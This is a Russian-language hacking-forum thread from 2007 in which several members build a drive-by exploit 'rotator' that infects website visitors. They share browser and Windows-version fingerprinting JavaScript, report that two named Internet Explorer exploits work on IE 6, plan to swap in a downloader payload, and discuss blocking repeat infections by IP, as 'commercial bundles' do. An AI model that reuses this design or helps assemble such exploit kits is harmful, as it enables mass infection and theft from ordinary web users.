Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
01.05.2007, 12:06
|
|
Постоянный
Регистрация: 29.04.2007
Сообщений: 496
Провел на форуме:
2715445
Репутация:
588
|
|
но ведь в той же опере или мозилле можно выбрать опцию -> идентифицировать \
как ... в этом случае браузер будет определён правильно?
|
|
|
02.05.2007, 13:10
|
|
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287
Репутация:
4738
|
|
Сообщение от Hellsp@wn
но ведь в той же опере или мозилле можно выбрать опцию -> идентифицировать \
как ... в этом случае браузер будет определён правильно?
Х.е.з. Может и не правильно, в самих сплоитах ещё есть функции определения браузера и версии системы, например вот:
Код:
function GetSystemVersion()
{
//Simple Detecting of OS version out of Jscript version:
var ver = "";
ver += ScriptEngineMajorVersion();
ver += ScriptEngineMinorVersion();
ver += ScriptEngineBuildVersion();
if ( ver<568820 ){ return("preSP2"); }
else if ( ver<575730 ){ return("SP2"); }
else return (0);
}
|
|
|
|
14.05.2007, 23:39
|
|
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120
Репутация:
2565
|
|
Сообщение от Hellsp@wn
но ведь в той же опере или мозилле можно выбрать опцию -> идентифицировать \
как ... в этом случае браузер будет определён правильно?
Вот нормальный скрипт для определения типа браузера на JavaScript
Код:
<script language="javascript">
var BrUserAgent = navigator.userAgent.toLowerCase();
var BrUserVersion = parseInt(navigator.appVersion);
if(BrUserAgent.indexOf('opera')!=-1){
document.write('Opera');
}
else if(BrUserAgent.indexOf('msie')!=-1){
document.write('IE');
}
else if(BrUserAgent.indexOf('mozilla')!=-1){
document.write('mozilla');
}
else{
document.write('unknown');
}
</script>
to -=lebed=-
Твой скрипт определения браузера протестил, действительно можно обойти проверку изменив идентификацию в опциях. Скрипт выше определяет правильно, если изменять идентификацию в опциях оперы или мозилы.
Но если будет изменяться UserAgent в HTTP заголовке, например с помощью проксей или спец. прог, то и этот скрипт не поможет!
Со 100% вероятностью можно определить только оперу по специфичному свойству window.opera.
Кстати как там на счет продолжения ротатора? Готов помочь генерить сплойты  Да и продолжение статьи вообще будет? Хотелось бы почитать про обфускацию HTML, что нидь новенькое.
Последний раз редактировалось [53x]Shadow; 15.05.2007 в 15:49..
|
|
|
|
17.05.2007, 11:04
|
|
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287
Репутация:
4738
|
|
Подправил немного под себя:
Код:
<!-- Функция определения броузера (перенная name_brouser - Название, code_brouser - Присвоенный код, ver_brouser - версия браузера, в зависимости от параметра [p] выдаёт код броузера (code_brouser), имя броузера (name_brouser), или версию браузера (ver_brouser) -->
function test_brouser(p) {
var BrUserAgent = navigator.userAgent.toLowerCase();
var name_brouser = navigator.appName
var ver_brouser = navigator.appVersion;
var code_brouser = 0
if(BrUserAgent.indexOf('opera')!=-1){
code_brouser=1;
}
else if(BrUserAgent.indexOf('msie')!=-1){
code_brouser=0;
}
else if(BrUserAgent.indexOf('mozilla')!=-1){
code_brouser=2;
}
else {
code_brouser=3;
}
if (p===0)
{return code_brouser;}
else if (p===1)
{return name_brouser;}
else
{return ver_brouser;}
}
Я думаю не стоить пока парсить navigator.appName - так больше инфы возвращает функция. (пропарсить мона потом при вызове). |
|
|
|
17.05.2007, 11:19
|
|
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287
Репутация:
4738
|
|
кароче вот Вам заготовка: скачать (вместо сплоитов - пустые страницы, пока... ну и задержка там маленькая стоит)
Прошу затестить и отписаться у кого какой код ситуации. Попросту при запуске index.htm или обновлённого index(обход подмены идентификации броузера).htm страница с каким номером не находится. В ротаторе заложены только три кода ситуации для IE 6 (3), Оперы 9 (19), FireFox (35).
Респект [53x]Shadow за функцию.
Последний раз редактировалось -=lebed=-; 17.05.2007 в 13:28..
|
|
|
|
17.05.2007, 13:31
|
|
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120
Репутация:
2565
|
|
Короче вроде все путем протестил на IE и FireFox! Оперы под рукой нет, если что вечером прогоню. А так все прикольно работает, тока не понятно пока зачем cpu, если переменная всегда равна 0 и в 11.html надо номер эксплойта исправить с 1 на 11, но енто мелочь, правда не приятная, долго вникал в цикл думал ошибка |
|
|
|
17.05.2007, 13:33
|
|
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287
Репутация:
4738
|
|
Затестил сегодня: Microsoft Internet Explorer ADODB.Recordset Double Free Memory Exploit (ms07-009) и Ms Windows (.ani) Gdi Remote Elevation Of Privilege Exploit (ms07-017) - оба сплоита пашут под IE 6, осталось сменить начинку на загрузчик... |
|
|
|
17.05.2007, 13:39
|
|
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287
Репутация:
4738
|
|
Сообщение от [53x]Shadow
Короче вроде все путем протестил на IE и FireFox! Оперы под рукой нет, если что вечером прогоню. А так все прикольно работает, тока не понятно пока зачем cpu, если переменная всегда равна 0 и в 11.html надо номер эксплойта исправить с 1 на 11, но енто мелочь, правда не приятная, долго вникал в цикл думал ошибка 1. Начинал писать с размахом сначала (но потом на MAC решил забить, ведь другая архитектура - другие шеллкоды, в принципе щас не актуально, можно исключить.
2. А ну да, страницы не хватало, просто скопировал с 1.html, а в теле поменять забыл...
P.S. А вообще для ротации 3-5 последних сплоитов заглаза хватит! Если уж последние не пробьют, то смысла подсовывать какие-более ранние не вижу..
Потом в планах функция определения пробил сплоит браузер или нет и в случае пробива завершение ротации...
Последний раз редактировалось -=lebed=-; 17.05.2007 в 13:44..
|
|
|
|
17.05.2007, 15:21
|
|
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120
Репутация:
2565
|
|
Кстати я тут подумал, было бы не плохо реализовать функцию защиты от повторного заражения. То есть если пользователь уже был на странице, переслать его на обычную страницу. Это можно легко реализовать на php сохраняя и фильтруя ip-адреса, прокси не рассматриваем. Но так как весь ротатор реализован на javascript, есть по крайней мере один (запарился гуглить) вариант, с использованием SSI:
Код:
<script language="JavaScript">
var ip = '<!--#echo var="REMOTE_ADDR"-->';
alert("Your IP address is "+ip);
</script>
Других оптимальных вариантов просто не нашел. |
|
|
|
17.05.2007, 15:42
|
|
Fail
Регистрация: 17.09.2005
Сообщений: 2,242
Провел на форуме:
9089375
Репутация:
4268
|
|
Сообщение от [53x]Shadow
Кстати я тут подумал, было бы не плохо реализовать функцию защиты от повторного заражения. То есть если пользователь уже был на странице, переслать его на обычную страницу. Это можно легко реализовать на php сохраняя и фильтруя ip-адреса, прокси не рассматриваем. Но так как весь ротатор реализован на javascript, есть по крайней мере один (запарился гуглить) вариант, с использованием SSI:
Код:
<script language="JavaScript">
var ip = '<!--#echo var="REMOTE_ADDR"-->';
alert("Your IP address is "+ip);
</script>
Других оптимальных вариантов просто не нашел. Вообще, по - нормальному, функцию бана по ип, обязательную кстати в коммерческих связках, следует реализовывать на пхп. А те адреса, что в бане стоит хрнанить в базе mysql. ИМХО неплохо получаеться=)
__________________
...
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [53x]Shadow](/avatars/avatar32248.gif){kind=avatar}
Похожие темы
Линейный вид
